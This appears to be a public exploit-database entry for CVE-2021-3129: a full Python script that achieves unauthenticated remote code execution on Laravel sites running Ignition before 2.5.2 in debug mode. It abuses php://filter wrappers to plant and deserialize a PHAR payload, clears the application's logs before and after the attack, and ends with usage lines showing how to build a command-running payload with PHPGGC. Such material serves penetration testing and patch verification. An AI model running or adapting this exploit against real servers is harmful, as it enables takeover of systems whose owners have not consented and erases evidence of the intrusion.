# Exploit Title: Laravel debug mode Remote Code Execution (Ignition <= 2.5.1)
# Date: 05/04/2021
# Exploit Author: Tobias Marcotto
# Tested on: Kali Linux x64
# Version: < 2.5.1
# Description: Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents(). This is exploitable on sites using debug mode with Laravel before 8.4.2.
# CVE : CVE-2021-3129
*********************************************************************************************************
#!/usr/bin/env python3.7
import base64
import re
import sys
from dataclasses import dataclass
import requests
@dataclass
class Exploit:
session: requests.Session
url: str
payload: bytes
log_path: str
def main(self):
if not self.log_path:
self.log_path = self.get_log_path()
try:
self.clear_logs()
self.put_payload()
self.convert_to_phar()
self.run_phar()
finally:
self.clear_logs()
def success(self, message, *args):
print('+ ' + message.format(*args))
def failure(self, message, *args):
print('- ' + message.format(*args))
exit()
def get_log_path(self):
r = self.run_wrapper('DOESNOTEXIST')
match = re.search(r'"file":"(\\/[^"]+?)\\/vendor\\/[^"]+?"', r.text)
if not match:
self.failure('Unable to find full path')
path = match.group(1).replace('\\/', '/')
path = f'{path}/storage/logs/laravel.log'
r = self.run_wrapper(path)
if r.status_code != 200:
self.failure('Log file does not exist: {}', path)
self.success('Log file: {}', path)
return path
def clear_logs(self):
wrapper = f'php://filter/read=consumed/resource={self.log_path}'
self.run_wrapper(wrapper)
self.success('Logs cleared')
return True
def get_write_filter(self):
filters = '|'.join((
'convert.quoted-printable-decode',
'convert.iconv.utf-16le.utf-8',
'convert.base64-decode'
))
return f'php://filter/write={filters}/resource={self.log_path}'
def run_wrapper(self, wrapper):
solution = "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution"
return self.session.post(
self.url + '/_ignition/execute-solution/',
json={
"solution": solution,
"parameters": {
"viewFile": wrapper,
"variableName": "doesnotexist"
}
}
)
def put_payload(self):
payload = self.generate_payload()
# This garanties the total log size is even
self.run_wrapper(payload)
self.run_wrapper('AA')
def generate_payload(self):
payload = self.payload
payload = base64.b64encode(payload).decode().rstrip('=')
payload = ''.join(c + '=00' for c in payload)
# The payload gets displayed twice: use an additional '=00' so that
# the second one does not have the same word alignment
return 'A' * 100 + payload + '=00'
def convert_to_phar(self):
wrapper = self.get_write_filter()
r = self.run_wrapper(wrapper)
if r.status_code == 200:
self.success('Successfully converted to PHAR !')
else:
self.failure('Convertion to PHAR failed (try again ?)')
def run_phar(self):
wrapper = f'phar://{self.log_path}/test.txt'
r = self.run_wrapper(wrapper)
if r.status_code != 500:
self.failure('Deserialisation failed ?!!')
self.success('Phar deserialized')
# We might be able to read the output of system, but if we can't, it's ok
match = re.search('^(.*?)\n<!doctype html>\n<html class="', r.text, flags=re.S)
if match:
print('--------------------------')
print(match.group(1))
print('--------------------------')
elif 'phar error: write operations' in r.text:
print('Exploit succeeded')
else:
print('Done')
def main(url, payload, log_path=None):
payload = open(payload, 'rb').read()
session = requests.Session()
#session.proxies = {'http': 'localhost:8080'}
exploit = Exploit(session, url.rstrip('/'), payload, log_path)
exploit.main()
if len(sys.argv) <= 1:
print(
f'Usage: {sys.argv[0]} <url> </path/to/exploit.phar> [log_file_path]\n'
'\n'
'Generate your PHAR using PHPGGC, and add the --fast-destruct flag if '
'you want to see your command\'s result. The Monolog/RCE1 GC works fine.\n\n'
'Example:\n'
' $ php -d\'phar.readonly=0\' ./phpggc --phar phar -f -o /tmp/exploit.phar monolog/rce1 system id\n'
' $ ./laravel-ignition-rce.py http://127.0.0.1:8000/ /tmp/exploit.phar\n'
)
exit()
main(sys.argv[1], sys.argv[2], (len(sys.argv) > 3 and sys.argv[3] or None))